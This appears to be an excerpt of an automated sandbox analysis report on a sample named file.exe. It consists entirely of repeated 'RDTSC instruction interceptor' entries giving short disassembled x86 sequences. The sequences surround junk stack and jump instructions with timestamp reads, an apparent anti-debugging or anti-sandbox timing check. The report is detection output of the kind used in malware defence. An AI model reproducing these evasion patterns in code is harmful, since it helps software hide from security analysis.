    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFA17A second address: CFA17E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFA17E second address: CFA182 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFA306 second address: CFA30A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF9E3D second address: CF9E41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF9E41 second address: CF9E45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF9E45 second address: CF9E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F72B9AA7986h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF9E54 second address: CF9E6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F72B8E40C01h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFADBA second address: CFADC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFD453 second address: CFD48A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 pop eax 0x00000007 jmp 00007F72B8E40C07h 0x0000000c jmp 00007F72B8E40C02h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFD48A second address: CFD4BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F72B9AA7999h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F72B9AA798Fh 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFCFDF second address: CFCFE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFD13C second address: CFD149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jl 00007F72B9AA798Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFD149 second address: CFD14F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFD14F second address: CFD171 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F72B9AA799Dh 0x00000008 jmp 00007F72B9AA7997h 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFFEAB second address: CFFEAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFFEAF second address: CFFEB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFFEB3 second address: CFFEC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007F72B8E40BFEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C73D33 second address: C73D39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C73D39 second address: C73D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C73D3F second address: C73D43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D09738 second address: D09741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D09741 second address: D09747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D09747 second address: D0974B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0974B second address: D0974F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0974F second address: D09786 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F72B8E40BFCh 0x0000000c je 00007F72B8E40BF6h 0x00000012 popad 0x00000013 jmp 00007F72B8E40C00h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jns 00007F72B8E40BF6h 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D09786 second address: D0978C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0978C second address: D097A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F72B8E40BFBh 0x00000009 js 00007F72B8E40BF6h 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D09A70 second address: D09A74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D09A74 second address: D09A7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0A020 second address: D0A02A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F72B9AA7986h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0A02A second address: D0A039 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0A039 second address: D0A048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 jo 00007F72B9AA7986h 0x0000000e popad 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0A9E2 second address: D0A9E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E9C0 second address: D0E9DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007F72B9AA7986h 0x0000000d jmp 00007F72B9AA798Dh 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E9DA second address: D0E9E7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F72B8E40BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0DCB0 second address: D0DCDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F72B9AA799Eh 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007F72B9AA7996h 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0DCDA second address: D0DCE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0DCE0 second address: D0DCFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F72B9AA798Dh 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0DFBD second address: D0DFC7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F72B8E40BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E156 second address: D0E16E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b pushad 0x0000000c jg 00007F72B9AA7986h 0x00000012 push esi 0x00000013 pop esi 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E16E second address: D0E17E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jnl 00007F72B8E40BF6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E431 second address: D0E43B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 popad 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E43B second address: D0E443 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E443 second address: D0E453 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jl 00007F72B9AA7986h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E453 second address: D0E457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E5A6 second address: D0E5AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D156C4 second address: D156CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D156CA second address: D156CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D156CE second address: D156F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72B8E40C09h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F72B8E40BFAh 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D156F7 second address: D156FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15A04 second address: D15A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15A0A second address: D15A0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15A0E second address: D15A1A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 je 00007F72B8E40BF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15A1A second address: D15A35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72B9AA7992h 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15A35 second address: D15A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F72B8E40BFCh 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15A4A second address: D15A4F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15D1D second address: D15D31 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F72B8E40BF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnc 00007F72B8E40BF8h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15D31 second address: D15D37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15D37 second address: D15D3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15D3B second address: D15D45 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D162FD second address: D16301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16301 second address: D16317 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F72B9AA7990h 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16B33 second address: D16B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16B3A second address: D16B5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F72B9AA7997h 0x00000009 jnc 00007F72B9AA7986h 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16B5B second address: D16B5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16B5F second address: D16B72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F72B9AA7986h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16B72 second address: D16B94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72B8E40C05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnl 00007F72B8E40BF6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16B94 second address: D16B9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16B9A second address: D16BA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16E4C second address: D16E50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16E50 second address: D16E69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F72B8E40C03h 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16E69 second address: D16E7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F72B9AA798Dh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1AED1 second address: D1AED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1AED5 second address: D1AEDF instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F72B9AA7986h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1AEDF second address: D1AEFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jng 00007F72B8E40BF6h 0x0000000d pop edi 0x0000000e jmp 00007F72B8E40BFBh 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1AEFE second address: D1AF08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F72B9AA7986h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1A511 second address: D1A517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1A517 second address: D1A51D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1A51D second address: D1A522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1A66D second address: D1A672 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1A935 second address: D1A93D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1AACA second address: D1AACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1AACE second address: D1AAD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1AAD2 second address: D1AADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1AADC second address: D1AAE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1AAE0 second address: D1AAE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1F525 second address: D1F546 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jmp 00007F72B8E40C05h 0x0000000c pop esi 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1F546 second address: D1F54E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D20C41 second address: D20C4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F72B8E40BF6h 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D20C4D second address: D20C53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D20C53 second address: D20C5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D20C5D second address: D20C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F72B9AA798Ch 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2730E second address: D27313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D27AC3 second address: D27ADC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72B9AA7993h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D27ADC second address: D27AE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F72B8E40BF6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D27C96 second address: D27C9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D27E01 second address: D27E2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F72B8E40BFAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F72B8E40C09h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D27E2C second address: D27E64 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F72B9AA7986h 0x00000008 jmp 00007F72B9AA7993h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007F72B9AA7996h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D27FB4 second address: D27FB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D27FB8 second address: D27FBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D27FBC second address: D27FD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F72B8E40BF6h 0x0000000e jl 00007F72B8E40BF6h 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D28DC6 second address: D28DD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F72B9AA798Dh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D32410 second address: D32414 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D32414 second address: D3241F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D31F95 second address: D31FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jno 00007F72B8E40BF6h 0x0000000e jno 00007F72B8E40BF6h 0x00000014 popad 0x00000015 push ecx 0x00000016 jng 00007F72B8E40BF6h 0x0000001c pop ecx 0x0000001d popad 0x0000001e push edi 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
